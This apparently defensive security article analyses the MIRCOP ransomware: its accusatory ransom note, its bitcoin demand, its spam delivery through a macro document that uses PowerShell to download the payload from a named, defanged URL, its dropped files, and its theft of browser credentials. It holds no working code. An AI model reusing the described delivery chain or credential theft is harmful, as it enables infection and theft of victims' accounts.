A particularly unusual encryption virus was detected earlier this week. The infection was identified as RANSOM_MIRCOP.A, or MIRCOP for short. The oddness of the program comes from its decision to assume the victim role. There have been other instances of ransomware putting the blame on the user, but they have all represented a certain institution. MIRCOP does not claim to be associated to a government or federal representative. Rather, the infection poses as an anonymous victim of data theft. As such, the program treats the user as a criminal.
MIRCOP has devised a ransom note which puts the blame on the user and issues a serious threat to him. The program claims you have stolen 48.48 BTC from the wrong people. An image of the Guy Fawkes character is included in the message. The implication being that you have tampered with the property of a hacktivist organization. The people behind the ransomware make the assumption that you are already familiar with how cyber attacks are conducted. MIRCOP does not explain how you can complete the redemption payment. It only lists a bitcoin address, suggesting you would know how to carry out the transaction.
MIRCOP is harsh in both its judgment and its demands. The ransom of 48.48 bitcoins amounts to the astounding sum of $32,949.43 USD as of June 24. The bitcoin cryptocurrency fluctuates just like all national and international currencies. In any event, the sum is quite high. It ranks among the highest ransoms ever demanded by cyber criminals.
Although MIRCOP is a master of psychological tricks, its strategy has not paid dividends. The bitcoin address of the hackers has not received any payments to date. The most obvious reason is the high amount of the ransom. The lack of instructions on the payment procedure can also be to blame for their shortcomings. The “anonymous” hackers claim to have knowledge of the person they are confronting, but this statement is far fetched. If they do not, they could very well come across people who are unfamiliar with bitcoins and online transactions in general.
Getting to know the distribution technique of MIRCOP ransomware can help you avoid the program. The algorithm is strict and meticulous in every step of the way. The virus travels through spam e-mails. It hides behind an attached document, listed as a Thai customs declaration for the import and export of goods. A malicious macro is used for transferring the ransomware. The code makes use of Windows PowerShell to prompt the download of the MIRCOP. The macro is enabled through a text within the document.
When the file is accessed, the macro establishes a connection with the following web page to download the virus: hxxp://www[.]blushy[.]nl/u/putty.exe. The compromised website links to an adult sex shop which is only available in Dutch language.
MIRCOP creates three files in the %temp% folder. Each of them is assigned to perform a certain task. The c.exe process steals information from the user’s system, while x.exe and y.exe encrypt files.
Another unusual characteristic about MIRCOP is that it uses a prefix to mark the encrypted files rather than a suffix. The program prepends the .Lock string to each infected file.
The topic of data theft should be addressed in detail. The personal information you have entered into your system may be more sensitive than the data, contained in your files. MIRCOP has the ability to record credentials from web browsers Google Chrome, Mozilla Firefox and Opera. This includes your login details for all your personal and financial accounts. It can also access information from platforms and software like Filezilla and Skype.
In conclusion, we can assure you that the claims of MIRCOP are false. The developers of the program do not have any knowledge on you or your system. You owe them nothing. To protect your computer from future attacks, you need to review your e-mails carefully. A lot of malware programs are spread through spam letters. If you have any doubts about the reliability of a given message, do not open any files from it. Do an identity check first. You can look up the e-mail address to see if the sender is who he claims to be. Visit the official website of the entity he is representing to match the contacts. If necessary, contact the organization.
